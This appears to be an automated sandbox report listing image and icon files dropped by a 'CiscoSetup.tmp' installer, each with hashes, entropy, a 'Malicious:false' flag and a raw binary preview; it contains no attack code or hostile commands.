                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                                                                                  MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                                                                                  SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                                                                                  SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                                                                                  SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                                                                                  MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                                                                                  SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                                                                                  SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                                                                                  SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                                                                                  MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                                                                                  SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                                                                                  SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                                                                                  SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
